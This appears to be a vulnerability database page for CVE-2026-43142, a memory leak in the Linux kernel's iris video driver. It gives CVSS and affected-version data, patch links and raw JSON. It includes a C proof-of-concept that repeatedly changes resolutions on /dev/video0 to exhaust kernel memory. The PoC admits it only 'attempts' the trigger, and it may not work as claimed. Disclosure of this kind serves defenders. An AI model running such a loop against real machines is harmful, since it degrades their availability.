Security Vulnerability Report
CVE-2026-43142 CVSS 5.5 MEDIUM

Published: 2026-05-06 12:16:32
Last Modified: 2026-05-13 18:41:14
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

media: iris: gen1: Destroy internal buffers after FW releases

After the firmware releases internal buffers, the driver was not destroying them. This left stale allocations that were no longer used, especially across resolution changes where new buffers are allocated per the updated requirements. As a result, memory was wasted until session close.

Destroy internal buffers once the release response is received from the firmware.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

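cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.15 up to, but not including, 6.18.16) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.19 up to, but not including, 6.19.6) - VULNERABLE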
Linux Kernel (Specific versions including iris driver before patch)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-43142: Linux Kernel Iris Driver Memory Leak
 * This PoC attempts to trigger the memory leak by repeatedly changing
 * the resolution/format of the video device.
 * Compilation: gcc -o poc_leak poc_leak.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/videodev2.h>

#define DEVICE "/dev/video0" // Assuming iris driver is registered here
#define ITERATIONS 10000

int main(void)
{
    int fd = -1;
    struct v4l2_format fmt;
    int i;

    fd = open(DEVICE, O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    /* Zero the struct so fields that are not set below are not passed uninitialised */
    memset(&fmt, 0, sizeof(fmt));

    printf("Starting resolution change loop to trigger leak...\n");

    for (i = 0; i < ITERATIONS; i++) {
        // Toggle between two resolutions to force buffer reallocation

        // Resolution A
        fmt.type = V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE;
        fmt.fmt.pix_mp.width = 1920;
        fmt.fmt.pix_mp.height = 1080;
        fmt.fmt.pix_mp.pixelformat = V4L2_PIX_FMT_NV12;
        ioctl(fd, VIDIOC_S_FMT, &fmt);

        // Resolution B
        fmt.fmt.pix_mp.width = 1280;
        fmt.fmt.pix_mp.height = 720;
        ioctl(fd, VIDIOC_S_FMT, &fmt);

        if (i % 100 == 0) {
            printf("Iteration %d\n", i);
        }
    }

    close(fd);
    printf("PoC execution completed. Check kernel memory usage.\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43142", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:31.633", "lastModified": "2026-05-13T18:41:13.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: iris: gen1: Destroy internal buffers after FW releases\n\nAfter the firmware releases internal buffers, the driver was not\ndestroying them. This left stale allocations that were no longer used,\nespecially across resolution changes where new buffers are allocated per\nthe updated requirements. As a result, memory was wasted until session\nclose.\n\nDestroy internal buffers once the release response is received from the\nfirmware."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15", "versionEndExcluding": "6.18.16", "matchCriteriaId": "5B5F989F-E891-48E4-9EC9-3C5EFD3DB9DC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1dabf00ee206eceb0f08a1fe5d1ce635f9064338", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7cde76db8883ec8a3d1456068079ecadbfb15ca5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d4457f23ac0130240053a34be663f0fade3bb371", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}